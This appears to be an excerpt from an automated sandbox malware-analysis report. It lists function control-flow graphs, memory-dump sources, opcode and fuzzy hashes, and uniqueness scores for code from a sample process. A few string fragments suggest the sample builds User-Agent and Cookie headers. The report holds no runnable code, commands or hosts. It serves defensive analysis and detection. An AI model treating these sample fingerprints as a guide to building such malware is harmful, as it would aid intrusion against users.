                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 109 ee4674-ee468d call ee3a1c 112 ee468f-ee4698 call ee3a6e 109->112 113 ee469d-ee46cd 109->113 112->113 116 ee47e7-ee47ec 113->116 117 ee46d3-ee46f5 113->117 117->116 119 ee46fb-ee4720 117->119 121 ee4738-ee475a 119->121 122 ee4722-ee4737 119->122 124 ee47bf-ee47c9 121->124 125 ee475c-ee477e 121->125 122->121 126 ee47cb-ee47dd call ee3673 124->126 127 ee47e0-ee47e5 124->127 125->124 131 ee4780-ee47a2 125->131 126->127 127->116 131->124 133 ee47a4-ee47bc 131->133 133->124
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: faa040c0f205030a530cd5e8ff3cdfbe1d0ed7eefc94c835a1de919e6633f3f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 144164B6500248BFEF129FA5CC48BDEBBBAEF80704F154069EA44BA254D7309650CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00EE4675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 134 ee4675-ee4680 135 ee468b-ee468d 134->135 136 ee4686 call ee3a1c 134->136 137 ee468f-ee4698 call ee3a6e 135->137 138 ee469d-ee46cd 135->138 136->135 137->138 141 ee47e7-ee47ec 138->141 142 ee46d3-ee46f5 138->142 142->141 144 ee46fb-ee4720 142->144 146 ee4738-ee475a 144->146 147 ee4722-ee4737 144->147 149 ee47bf-ee47c9 146->149 150 ee475c-ee477e 146->150 147->146 151 ee47cb-ee47dd call ee3673 149->151 152 ee47e0-ee47e5 149->152 150->149 156 ee4780-ee47a2 150->156 151->152 152->141 156->149 158 ee47a4-ee47bc 156->158 158->149
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: 5fd415bd397c133f12a0f7618e82ac3f1ed3797954ee7136152bc536192ba971
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: 054163B6500248BFEF125FA5CC48BDEBBBAEF80704F154069EA44BA294D7309A50CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 02D3093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 2d3093e-2d3095f call 2d30cc4 call 2d314bc call 2d33cc0 8 2d30967-2d30989 0->8 10 2d30af1-2d30af2 8->10 11 2d3098f-2d309d2 call 2d309d9 8->11 15 2d309d4-2d309d5 11->15 16 2d30a3d-2d30a76 11->16 18 2d309d7-2d309e8 call 2d33653 15->18 19 2d30a3c 15->19 17 2d30a7e-2d30a80 16->17 20 2d30a82-2d30aae 17->20 21 2d30aec call 2d30af3 17->21 18->21 30 2d309ee-2d30a10 18->30 19->16 20->21 27 2d30ab0-2d30abc 20->27 21->10 31 2d30ac1-2d30ae5 27->31 30->21 34 2d30a16-2d30a3b 30->34 31->10 37 2d30ae7-2d30aea 31->37 34->21 38 2d30a41-2d30a76 34->38 37->21 37->31 38->17
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 849468fec9f7453cbc25eb71ffb4a0633e76873246bed3a94dfea32efc3a4019
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: F0518F316482549FEB239F20CC85B9A77BCEF04744F0801D9FA49FE1D6DBB09A94CA65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02D314BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 39 2d314bc-2d31590 call 2d314de call 2d30c9c call 2d31345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                                          • Instruction ID: ab33c831861c441f8135baddd07f7ad0dffe48416a06f8adce800c3971cab41c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D221FA724046249EDF03AF60C9C88A673ECEF40704F45096A99C9EF049FE709554CEF6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02D31345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 58 2d31345-2d31352 59 2d313eb-2d313ec 58->59 60 2d31358-2d3135e 58->60 60->59 61 2d31364-2d3137a 60->61 61->59 63 2d3137c-2d3138f 61->63 65 2d31391-2d31398 63->65 66 2d3139b-2d313ab call 2d30e7c 65->66 69 2d313ad-2d313e2 66->69 69->59
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: db3d2522bb4ffa16910e4fa9ce89517245fcf5f54b70cc8d9baf55647e45c9da
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 36219031A04216AFDF129F78C844B5DBBB5AF04704F094215FD59BB694D770EC10CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02D314DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 70 2d314de-2d31590 call 2d33653 call 2d30c9c call 2d31345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                                          • Instruction ID: bd3c1c02b5e77d58f7a9dd5812d166b939635e0a919cea16ad22a576bbdf2f69
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F1160724046259EEF03AF60C5C88AA73ECEE40708F8509BA9DC9EE549FE709554CEF5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02D33F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 88 2d33f0d-2d33f29 call 2d33653 call 2d3379f 93 2d33f3b-2d33f66 call 2d33f78 * 3 88->93 94 2d33f2b-2d33f39 call 2d3401b 88->94 107 2d33f71 93->107 101 2d33f76-2d33f77 94->101 107->101 108 2d33f71 call 2d33f78 107->108 108->101
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction ID: 30dc8b5bb391ccc07b0885eee5b373bab253bf4c07e535fe1f7d85fcf8abdb83
                                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F01C70588280AAFF823BB0CE4965937B9EF40786F4405D1AA89ED2D4DE74CD50CEF5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02D34675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 134 2d34675-2d3468d call 2d33a1c 137 2d3468f-2d34698 call 2d33a6e 134->137 138 2d3469d-2d346cd 134->138 137->138 141 2d346d3-2d346f5 138->141 142 2d347e7-2d347ec 138->142 141->142 144 2d346fb-2d34720 141->144 146 2d34722-2d34737 144->146 147 2d34738-2d3475a 144->147 146->147 149 2d347bf-2d347c9 147->149 150 2d3475c-2d3477e 147->150 151 2d347e0-2d347e5 149->151 152 2d347cb-2d347dd call 2d33673 149->152 150->149 156 2d34780-2d347a2 150->156 151->142 152->151 156->149 158 2d347a4-2d347bc 156->158 158->149
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: bcfd9571be42433c5c55ce09ff855047655062545a78ddfb19883353c6e08b64
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: AC4163B6500208BFEF125FA5CC48BDEBFBAEF84704F154069EA44AA254DB74DA50CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02D34674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 109 2d34674-2d34680 110 2d3468b-2d3468d 109->110 111 2d34686 call 2d33a1c 109->111 112 2d3468f-2d34698 call 2d33a6e 110->112 113 2d3469d-2d346cd 110->113 111->110 112->113 116 2d346d3-2d346f5 113->116 117 2d347e7-2d347ec 113->117 116->117 119 2d346fb-2d34720 116->119 121 2d34722-2d34737 119->121 122 2d34738-2d3475a 119->122 121->122 124 2d347bf-2d347c9 122->124 125 2d3475c-2d3477e 122->125 126 2d347e0-2d347e5 124->126 127 2d347cb-2d347dd call 2d33673 124->127 125->124 131 2d34780-2d347a2 125->131 126->117 127->126 131->124 133 2d347a4-2d347bc 131->133 133->124
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: c8735c36cc2d790531b0d3adc4d71ca34f146f714da8dac9b6be63c25ab41e46
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 454153B6500208BFEF129FA5CC44BDEBBBAEF84704F154059EA44AA254D774DA50CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%